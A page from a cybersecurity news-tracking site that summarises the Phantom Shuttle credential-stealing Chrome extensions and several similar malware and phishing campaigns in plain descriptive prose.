CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Phantom Shuttle Chrome Extensions Steal User Credentials

First reported
Last updated
2 unique sources, 2 articles

Summary

Hide ▲

Two malicious Chrome extensions named 'Phantom Shuttle' have been discovered in the Chrome Web Store, targeting users in China, particularly foreign trade workers. These extensions, active since at least 2017, hijack user traffic and steal sensitive data by routing it through attacker-controlled proxies. The extensions are promoted as proxy and network speed testing tools but contain covert data-theft functionality. They intercept HTTP authentication challenges, capture form data, steal session cookies, and extract API tokens. The extensions have been found to route traffic from over 170 targeted domains through the C2 infrastructure, capturing a wide range of sensitive information. The operation is likely China-based, and the extensions remain available in the Chrome Web Store as of the time of reporting.

Timeline

  1. 23.12.2025 15:31 2 articles · 1d ago

    Phantom Shuttle Extensions Discovered in Chrome Web Store

    Two malicious Chrome extensions named 'Phantom Shuttle' have been found in the Chrome Web Store, targeting users in China. These extensions, active since at least 2017, hijack user traffic and steal sensitive data by routing it through attacker-controlled proxies. The extensions are promoted as proxy and network speed testing tools but contain covert data-theft functionality. They intercept HTTP authentication challenges, capture form data, steal session cookies, and extract API tokens. The extensions route traffic from over 170 targeted domains through the C2 infrastructure, capturing a wide range of sensitive information. The operation is likely China-based, and the extensions remain available in the Chrome Web Store as of the time of reporting.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

GhostPoster Campaign Uses Steganography in Firefox Addon Logos

A campaign named GhostPoster has been discovered, which hides malicious JavaScript code in the PNG logos of Firefox extensions. These extensions, with over 50,000 downloads, monitor browser activity and plant a backdoor. The hidden script acts as a loader that fetches the main payload from a remote server, retrieving it only 10% of the time to evade detection. The campaign involves 17 compromised extensions, primarily from popular categories like VPNs, weather, and translation tools. The payload can hijack affiliate links, inject tracking code, and commit click and ad fraud. Users are advised to remove these extensions and reset passwords for critical accounts.

Open in new tab

Urban VPN Proxy Chrome Extension Harvests AI Chat Data from Millions

The Urban VPN Proxy Chrome extension, featured on the Google Chrome Web Store with over six million users, has been found to silently intercept and collect AI chatbot conversations, including prompts and responses, from platforms like ChatGPT, Claude, and Gemini. The extension, updated in July 2025, uses hard-coded settings to enable this data harvesting by default, routing conversation data to remote servers for analysis and monetization. The extension's developer, Urban Cyber Security Inc., shares this data with an affiliated company, BIScience, which uses it for advertising and brand monitoring purposes. The extension also carries a 'Featured' badge, implying endorsement by Google and Microsoft, despite the privacy concerns. Researchers from Koi discovered that the extension injects code into supported AI websites and overrides standard browser network functions to capture conversations. This functionality was introduced in version 5.5.0 of the extension, released on July 9, 2025, and affects over eight million users across Chrome and Edge.

Open in new tab

ShadyPanda Browser Extensions Campaign Exploits 4.3M Installs

The ShadyPanda campaign has amassed over 4.3 million installations of malicious Chrome and Edge browser extensions, evolving from legitimate tools into spyware over multiple phases. The extensions, discovered by Koi Security, engaged in affiliate fraud, search hijacking, and remote code execution. The campaign remains active on the Microsoft Edge Add-ons platform, with one extension having 3 million installs. The extensions collect browsing history, search queries, keystrokes, mouse clicks, and other sensitive data, exfiltrating it to domains in China. Users are advised to remove these extensions and reset their account passwords. The ShadyPanda campaign used a supply-chain attack tactic by publishing or acquiring harmless extensions, letting them run clean for years to build trust and gain millions of installs, then suddenly flipping them into malware via silent updates. The compromised extensions became a fully fledged remote code execution (RCE) framework inside the browser, capable of downloading and running arbitrary JavaScript with full access to the browser's data and capabilities. The extensions could steal session cookies and tokens, allowing them to impersonate entire SaaS accounts such as Microsoft 365 or Google Workspace. The risk of malicious browser extensions extends beyond individual users, as they can access cookies, local storage, cloud auth sessions, active web content, and file downloads, blurring the line between endpoint security and cloud security. Organizations should enforce extension allow lists, treat extension access like OAuth access, audit extension permissions regularly, and monitor for suspicious extension behavior to reduce the risk of malicious extensions. Modern SaaS security platforms, such as Reco's Dynamic SaaS Security platform, can help organizations monitor and detect suspicious activity related to browser extensions in real time.

Open in new tab

Sturnus Android Malware Targets Encrypted Messaging Apps and Banking Credentials

Sturnus, a new Android banking trojan, steals messages from encrypted apps like Signal, WhatsApp, and Telegram by capturing screen content post-decryption. It performs full device takeover via VNC and overlays to steal banking credentials. The malware is under development but fully functional, targeting European financial institutions with region-specific overlays. It uses a mix of encryption methods for C2 communication and abuses Accessibility services for extensive control. The malware is disguised as legitimate apps like Google Chrome or Preemix Box, but distribution methods remain unknown. It establishes encrypted channels for commands and data exfiltration, and gains Device Administrator privileges to prevent removal. ThreatFabric reports low-volume attacks in Southern and Central Europe, suggesting testing for larger campaigns. New details reveal Sturnus uses WebSocket and HTTP channels for communication, displays full-screen overlays mimicking OS updates, and collects extensive device data for continuous feedback.

Open in new tab

VoidProxy phishing service targets Microsoft 365, Google accounts

A new phishing-as-a-service (PhaaS) platform, VoidProxy, targets Microsoft 365 and Google accounts, including those protected by third-party single sign-on (SSO) providers like Okta. The platform uses adversary-in-the-middle (AitM) tactics to steal credentials, multi-factor authentication (MFA) codes, and session cookies in real time. The attack begins with emails from compromised accounts at email service providers, which include shortened links redirecting recipients to phishing sites. The phishing sites are hosted on disposable low-cost domains and protected by Cloudflare to hide their real IPs. Additionally, a new phishing automation platform named Quantum Route Redirect (QRR) is targeting Microsoft 365 users worldwide. QRR uses around 1,000 domains hosted on parked or compromised domains to steal credentials. The attacks start with malicious emails impersonating various services, redirecting users to credential harvesting pages. QRR employs a built-in filtering mechanism to distinguish between bots and human visitors, redirecting humans to phishing pages while sending bots to benign sites. QRR has been observed targeting Microsoft 365 accounts across 90 countries, with 76% of attacks directed at U.S. users. The platform offers advanced features such as a configuration panel, monitoring dashboards, intelligent traffic routing, and an analytics dashboard, making it easier for less technically minded cybercriminals to launch sophisticated phishing campaigns. QRR has been observed in the wild since August 2025 and uses a URL pattern of "/([\w\d-]+\.){2}[\w]{,3}\/quantum.php/" for its phishing campaigns. QRR can bypass Microsoft 365 email protections, including Microsoft Exchange Online Protection (EOP), secure email gateways (SEG), and integrated cloud email security (ICES) products. QRR's intelligent redirect system can differentiate between security tools and human visitors, redirecting security tools to legitimate websites and human visitors to phishing pages. QRR has been observed deceiving web application firewall products, enabling attacks to bypass multiple layers of security.

Open in new tab